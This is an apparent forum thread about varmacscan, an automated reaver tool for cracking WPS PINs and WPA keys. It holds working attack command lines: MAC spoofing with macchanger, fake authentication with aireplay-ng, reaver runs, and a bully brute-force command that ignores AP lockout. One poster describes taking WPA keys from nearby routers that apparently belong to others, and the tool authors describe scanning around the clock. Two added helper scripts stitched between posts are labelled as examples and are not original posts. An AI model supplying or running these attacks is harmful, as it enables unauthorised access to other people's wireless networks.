
Thread: Varmacscan2-0 an automatic multi-target reaver attack tool released

  1. #51
    Join Date
    2013-Jul
    Posts
    818
    To thothao

    First, thank you for your interest. This is an important point in a successful reaver WPS/WPA pin/key extraction!

    The aireplay-ng warning is actually an old legacy warning: back in the early days of aircrack-ng and WEP cracking you had to add the -h device mac address to your command line. Later this was changed. If you go to infinityexists.com and dig through the WEP video files you will see them talking about the addition of this feature.

    However, there is a simple method to prove what mac address is being used.

    Place a wifi device in monitor mode and spoof the mac

    We use:

    airmon-ng start wlan0

    #To avoid airmon-ng check kill

    ifconfig wlan0mon down
    iwconfig wlan0mon mode monitor
    ifconfig wlan0mon up

    #Now spoof your mac

    ifconfig wlan0mon down
    macchanger -m 00:11:22:33:44:55 wlan0mon
    ifconfig wlan0mon up

    #Now pick a wifi network in your area and point airodump-ng at that network

    airodump-ng -c 1 --bssid 55:44:33:22:11:00 wlan0mon

    #Now open another terminal window and do a fake auth with aireplay-ng against the network

    aireplay-ng -1 10 -a 55:44:33:22:11:00 wlan0mon


    #Now look in your airodump-ng terminal window and you will see below the word "Station", what mac addresses are being used against the network.

    Furthermore:

    While varmacscan is running, an airodump-ng xterm window is open. Just expand the xterm window and look at the device mac being used. In closing, AND just in case you might have been right and something had changed in Linux or aircrack-ng, MTeams tested to see what mac address was being used and found the mac spoofed was in fact still being employed. It is seen in the aireplay-ng AP activation window and is also picked up by airodump-ng.

    Varmacscan changes the mac at every cycle and prints the Current Device Mac used in the main menu for this very reason. If your program is using a different mac address than shown for that cycle, write us again and we will try to duplicate it.


    Musket Teams
    Last edited by mmusket33; 2016-06-09 at 09:19.

  2. #52
    Join Date
    2016-Jun
    Posts
    12
    mmusket33

    I ran the script for a few days and it found 6 pins and one wpa key. I saw attacked APs permanently disabling or locking WPS (well, at least until next reboot, I guess).

    Based on my experience I have a few suggestions:
    1. add --wps option to airodump-ng. Sometimes an AP appears as having WPS not locked during the initial wash scan, but locks it permanently or temporarily once attacked. The added option allows you to see that in real time.
    I also added --uptime and --manufacturer; I don't see any harm in seeing those.
    Tip to anyone running airodump with --manufacturer option - run this command to update the reference files used by this feature:
    Code:
    airodump-ng-oui-update
    After I did, a few APs that were previously listed as Unknown now show the vendor. And I know one of them is a very old device, so it's not like updating will only add recently allocated macs; I don't know why the original reference files are so inferior.
    2. Make naming of PIN and WPA KEY files uniform, starting with BSSID or ESSID, so that PIN and KEY files for the same AP are grouped together in the folder.
    3. Make mac spoofing optional. My built-in VIA adapter appears to have a limited implementation of monitor mode and neither reaver nor bully can do **** when the mac is spoofed. Yet I cracked my first few APs using this adapter (not by varmacscan).
    4. I know I'm not the first to suggest it: remove the confirmations.
    Last edited by g0tmi1k; 1 Week Ago at 13:25. Reason: Foul language

  3. #53
    Join Date
    2013-Jul
    Posts
    818
    To MajorTom

    Thank you for your observations and suggestions. MTeams are working on using more and more WPS info from airodump-ng for both VMR-MDK and varmacscan. Your other points have been put on a list for consideration. However, our current priority is to make available a more effective robotic handshake collector through handshakeharvest and an updated Pwnstar9.0 with new passive DDOS features using airbase-ng as the DDOSing mechanism. We only got 2016.1 Rolling to remain stable two weeks ago. And testing for three (3) different operating systems, i.e. 1.1, 2 and 2016, takes time.

    Reference your mac-changing problems:

    Try
    airmon-ng start wlan0
    ifconfig wlan0mon down
    ifconfig wlan0mon hw ether 00:11:22:33:44:55
    ifconfig wlan0mon up

    reaver -i wlan0mon -b 00:01:02:03:04:05 -vv --mac=00:11:22:33:44:55

    or maybe

    ifconfig wlan0 down
    ifconfig wlan0 hw ether 00:11:22:33:44:55
    ifconfig wlan0 up
    airmon-ng start wlan0
    ifconfig wlan0mon down
    ifconfig wlan0mon hw ether 00:11:22:33:44:55
    ifconfig wlan0mon up
    reaver -i wlan0mon -b 00:01:02:03:04:05 -vv --mac=00:11:22:33:44:55


    Let us know if this works better.
    Last edited by mmusket33; 2016-06-14 at 16:33.

  4. #54
    Join Date
    2016-Jun
    Posts
    6
    Can someone help me? I have downloaded this script on the Kali 2016 version but I can't get it to work. Thanks in advance!!!

  5. #55
    Join Date
    2013-Jul
    Posts
    818
    To YssDiamond,

    MTeams need more info than "it does not work".

    Run from root

    Type chmod 755 <script name>

    ./<script name>

    ARM/LUKS encryption is not supported, as MTeams cannot test it.

    MTeams

  6. #56
    Join Date
    2016-Jun
    Posts
    6
    Also tried that, nothing. I'm doing everything right. Thanks for the quick reply and support!

  7. #57
    Join Date
    2016-Jun
    Posts
    6
    Problem solved, thank you Musket!!!

  8. #58
    Join Date
    2016-Jul
    Posts
    1
    How can I use the found PIN for auth? Network-Manager doesn't seem to support WPS PIN, and the command wpa_cli wps_pin any does not connect me to my network. I also checked with airodump-ng wlan1mon -c 5 --wps and there is no PBC.

    Thanks for help

  9. #59
    Join Date
    2016-Oct
    Posts
    3
    Hi, when I run varmacscan-K1-2-2016-3-3.sh it gets stuck at choosing Kali version:

    [attachment: Screenshot1.jpg]

    ...so I press Enter and nothing happens; it goes back to the previous screen:

    [attachment: Screenshot2.jpg]
    Hope someone can help with that.

  10. #60
    Join Date
    2016-Nov
    Posts
    1
    Thank you MTeam.

    I previously posted about my results, but since there was some incomplete information there I have edited my post to remove (my) speculation and only contain the facts.

    I can confirm that this program works as described by others. I started it about 48 hours ago, and it found four pins, but no wpa keys.

    Three of the pins listed are identical, and that made me (incorrectly) believe that there was some mistake by varmacscan. But - important detail - two of the essids indicate that it's the same ISP. Possible explanation for the exact same pin in different routers.

    While varmacscan continued running, I inserted the pins it found into bully. I used the -B option (bruteforce), and the -s option ('source' or modified mac address on my computer), as well as the -L option (ignore AP lockout), so the command looked like this:

    bully -s <my computer's spoofed mac address> -b <target APs mac address> -B -L <my wireless interface>
    It took a few tries, changing my mac address from time to time, and then the router presented the wpa key to me, and it also confirmed that the pin was correct. The last run took about ten minutes.

    After that, I tried the other router from the same ISP. This took about 5 hours of trial and failure with the same bully command, until it coughed up the wpa key and confirmed the pin. (These two routers confirmed the exact same pin, as varmacscan told me. I don't know how many customers would trust this ISP if they knew.)

    Conclusion: varmacscan took about 12 hours to find four pins for the ~15 APs within range, but was not efficient in using the pin to make the router give up the wpa key. However, using bully with the -B option and a spoofed mac address (-s option) was effective in the second step of the process.

    Possible recommendation: that bully is integrated into varmacscan. Thanks again MTeam.
    Last edited by Badngood; 2016-11-07 at 10:57. Reason: added new information

  11. #61
    Join Date
    2013-Jul
    Posts
    818
    To Badngood

    Thanks for the report.

    First MTeams wishes to point out that you are using varmacscan exactly as it was designed to be used. Varmacscan usually gets the pin and sometimes gets the WPA key. Getting the WPA key may take a bit of effort from the command line.

    MTeams is currently rewriting this program.

    It will provide several methods of making virtual monitors through airmon-ng and iw and a mixture of both.

    It will brute force the WPS pin, then try any pins found, and then try default pins such as 12345670 and 00000000 in sequence. We have begun finding routers with the all-zero default key, which is something new for us.

    Several AP activation routines will be added. Aireplay-ng will be made regenerative thru while true loops.

    With respect to bully, MTeams has made several attempts to integrate bully into these robotic processes, but in our areas bully just does not function well against the routers found. We therefore cannot test, and if we cannot test against real targets we cannot confirm any of the subroutines embedded in the script are actually functioning. However, we will again test with Annarchyys version.

    We have found that reaver, when run through Kali 2.0 and later, many times does not get the WPA key even when run from the command line. We immediately switch to Kali 1.10 and the WPA key is obtained. There is commentary in Top-Hat-Sec; see http://forum.top-hat-sec.com/index.php?topic=5647.0. There are comments about airmon-ng disruptions and using iw instead. We are exploring this issue, hence the reason for alternative virtual monitor setups in coming releases.

    For us this program has obtained more WPA keys than all other methods combined. This is only because of the robotic nature of the script. MTeams runs constant scans 24 hours a day when the computer is idle, then tries to obtain the WPA key through the command line. We will try bully through the command line again as you suggested.


    Musket Teams

  12. #62
    Join Date
    2015-Jul
    Location
    Around the World
    Posts
    7
    @mmusket33
    I have been testing your "varmacscan", but after updating to "Kali Linux 2016.2" the tool seems to have a problem starting "wlan0" in monitor mode (tried both ways). I have even tried to write a small shell file to overcome this, but the problem still persists. It would be better if you add the following to avoid the hard-blocked case or "SIOCSIFFLAGS: Operation not possible due to RF-kill", so that the program doesn't have a problem with it while creating the "Monitor Mode".
    And can you say which command you use in the file for reaver and also aireplay-ng?

    Command:
    rmmod -f <Wifi Driver Name> #Removing the Driver
    rfkill unblock all #Unblocking all device
    modprobe <Wifi Driver Name> #Installing the driver module.

    Thanks.

  13. #63
    Join Date
    2013-Jul
    Posts
    818
    To 9h05t

    MTeams currently has two(2) computers running varmacscan in hard drive installs of i386 kali-linux 2016R2. These computers have been updated but not upgraded and have been running constantly for over two months with no difficulties.


    All we can say with the info you provided is to make sure you choose the right program type when asked, i.e. Kali 1.10a, 2 and Rolling, and let the program install the monitors. A common error is to try and write the monitor designation when prompted rather than just selecting the line number next to the device.

    The SIOCSIFFLAGS due to RF-kill might be caused by running Kali Linux on a laptop which is dual-booted with Windows or requires Windows to turn on the wifi device. If this is the case, boot into Windows, get your internal wifi device functioning, then reboot into Linux. This would also apply to USB installs, both live and persistent. Note the computer writing this answer had this problem last month.


    All we ask at present is to go through the setup carefully. If the problem persists, write back and give us more info, but it is hard to correct if we cannot duplicate. We will also put our RV group on it if this answer does not help you.

    You can read the command lines for reaver and aireplay-ng. Just open the file with leafpad, press Ctrl-F and search for reaver or aireplay-ng, and you will find the various command lines embedded in xterm.



    Musket Teams
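The two posts above disagree on whether `rfkill unblock all` helps, and the reason is the soft/hard distinction: `rfkill unblock` only clears a soft block, while a hard block comes from a hardware switch, BIOS setting or a radio that the laptop firmware (or, as the reply notes, Windows) must enable first. The helper below, an added example and not part of varmacscan, parses `rfkill list` output and tells you which case you are in before you try to bring the monitor interface up. The `rfkill list` text is a constructed sample, not captured from a real machine, and the device-name keying (phy0, hci0) and the function names are assumptions.

```shell
#!/bin/sh
# Added example (not varmacscan's own code): classify RF-kill state per device
# from `rfkill list` output, so "SIOCSIFFLAGS: Operation not possible due to
# RF-kill" can be traced to a soft block (rfkill unblock fixes it) or a hard
# block (rfkill unblock cannot fix it).

# Constructed sample of `rfkill list` output; NOT from a real machine.
SAMPLE_RFKILL='0: phy0: Wireless LAN
    Soft blocked: no
    Hard blocked: yes
1: hci0: Bluetooth
    Soft blocked: yes
    Hard blocked: no'

# rfkill_verdict "<rfkill list output>" "<device name, e.g. phy0>"
# Prints one of: ok, soft, hard, soft+hard, missing
rfkill_verdict() {
    printf '%s\n' "$1" | awk -v want="$2" '
        # Header line "N: phy0: Wireless LAN": remember the device name.
        /^[0-9]+:/ { name = $2; sub(/:$/, "", name); soft[name] = "?"; hard[name] = "?"; next }
        /Soft blocked:/ { soft[name] = $3 }
        /Hard blocked:/ { hard[name] = $3 }
        END {
            if (!(want in soft)) { print "missing"; exit }
            s = (soft[want] == "yes"); h = (hard[want] == "yes")
            if (s && h) print "soft+hard"
            else if (h) print "hard"
            else if (s) print "soft"
            else print "ok"
        }'
}

# rfkill_advice "<rfkill list output>" "<device name>": one-line explanation.
rfkill_advice() {
    case "$(rfkill_verdict "$1" "$2")" in
        ok)      printf '%s\n' "$2: not blocked; the RF-kill error has another cause" ;;
        soft)    printf '%s\n' "$2: soft block; rfkill unblock clears it" ;;
        hard|soft+hard)
                 printf '%s\n' "$2: hard block; a hardware switch, BIOS or firmware/Windows must enable the radio, rfkill unblock cannot" ;;
        missing) printf '%s\n' "$2: no rfkill entry for this device" ;;
    esac
}

# Stand-alone run over the constructed sample. On a live system you would
# pass "$(rfkill list)" instead of "$SAMPLE_RFKILL".
rfkill_advice "$SAMPLE_RFKILL" phy0
rfkill_advice "$SAMPLE_RFKILL" hci0
```

Run it as-is to see the verdict for the sample, or replace the sample with `"$(rfkill list)"` on the machine that shows the error; a `hard` verdict means the `rmmod`/`rfkill unblock`/`modprobe` sequence from the earlier post will not help.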

  14. #64
    Join Date
    2017-Jan
    Posts
    4
    THX for this nice code.

    How can I create a whitelist for varmacscan-K1-2-2016-3-3.sh? Only a simple text file list of BSSIDs in /root/VARMAC_WHITELST? Like this:

    11:22:33:44:55:66
    77:88:99:00:11:22

    Same for whitelist handshakeharvest-K1-K2-K2016-4-0?

  15. #65
    Join Date
    2013-Jul
    Posts
    818
    Networks are whitelisted by writing a text file and naming the file with the mac code of the network, then a dash, and the word whitelist. This text file must be placed in the VARMAC_WHITELIST folder. The contents of the file are unimportant. The program looks for file names, not contents.


    File name example

    55:44:33:22:11:00-whitelist


    The program gives you the option to whitelist networks during setup and writes the file for you. BUT if you wish to manually whitelist networks prior to running the script, then open leafpad, enter the mac code of the network in the file as text if you wish, then name the file with the mac code, then a dash, then the word whitelist.

    And again, the program looks for mac codes in file names, not file contents, and each network has its own file.

    It was done this way to protect data. Each time a network is cracked the data is written to a separate file. Those networks are then automatically whitelisted and a text file written to the VARMAC_WHITELIST folder. Manually whitelisted networks have the name whitelist after the mac code and dash. Networks that have had their WPA key cracked have the word WPA_key-FOUND- then the essid.

    MTeams decided for data safety that each network cracked would have its data written to an individual file in root rather than putting all data collected in one file. We have seen programs where the user spends hours trying to obtain data and then, when found, the data is placed in the /tmp folder.

    Musket Teams
    Last edited by mmusket33; 2017-01-10 at 08:41.
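The file-name convention described in this answer is easy to get wrong by hand (lower-case mac, wrong separator, contents instead of name), so here is an added example, not varmacscan's own code, that resolves a BSSID against a folder exactly as the post describes: only the file name is consulted, `<MAC>-whitelist` marks a manual entry and `<MAC>-WPA_key-FOUND-<essid>` an automatic one. The folder is passed as a parameter (the post's default is /root/VARMAC_WHITELIST); the sample folder, the function names and the case-insensitive mac match are assumptions of this example.

```shell
#!/bin/sh
# Added example (not varmacscan's own code): look up whitelist status by file
# NAME, following the convention from the post:
#   <MAC>-whitelist               -> manually whitelisted
#   <MAC>-WPA_key-FOUND-<essid>   -> automatically whitelisted after a key was found
# File contents are ignored, as the post states.

# Normalise a mac to upper case so aa:bb:... and AA:BB:... match the same file.
norm_mac() {
    printf '%s' "$1" | tr 'a-f' 'A-F'
}

# whitelist_status DIR BSSID: prints "manual", "auto" or "none".
whitelist_status() {
    dir="$1"
    mac=$(norm_mac "$2")
    status="none"
    for f in "$dir"/*; do
        [ -e "$f" ] || continue
        name=$(basename "$f")
        fmac=$(norm_mac "${name%%-*}")   # text before the first dash (the mac has no dashes)
        rest="${name#*-}"                # everything after the first dash
        [ "$fmac" = "$mac" ] || continue
        case "$rest" in
            whitelist)        status="manual"; break ;;
            WPA_key-FOUND-*)  status="auto";   break ;;
        esac
    done
    printf '%s\n' "$status"
}

# list_whitelisted DIR: every BSSID the scanner would skip, one per line.
list_whitelisted() {
    for f in "$1"/*; do
        [ -e "$f" ] || continue
        name=$(basename "$f")
        case "$name" in
            *-whitelist|*-WPA_key-FOUND-*) norm_mac "${name%%-*}"; echo ;;
        esac
    done | sort -u
}

# Constructed sample folder (temporary, not real data) for a stand-alone run.
make_sample_dir() {
    d=$(mktemp -d)
    : > "$d/55:44:33:22:11:00-whitelist"               # manual entry, empty file
    : > "$d/AA:BB:CC:DD:EE:FF-WPA_key-FOUND-HomeNet"    # automatic entry
    : > "$d/notes.txt"                                  # unrelated file, ignored
    printf '%s\n' "$d"
}

demo_dir=$(make_sample_dir)
list_whitelisted "$demo_dir"
whitelist_status "$demo_dir" 55:44:33:22:11:00
whitelist_status "$demo_dir" 00:00:00:00:00:01
rm -rf "$demo_dir"
```

Point `whitelist_status` at the real VARMAC_WHITELIST folder to confirm that a manually created file is actually named the way the program expects before starting a long run.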
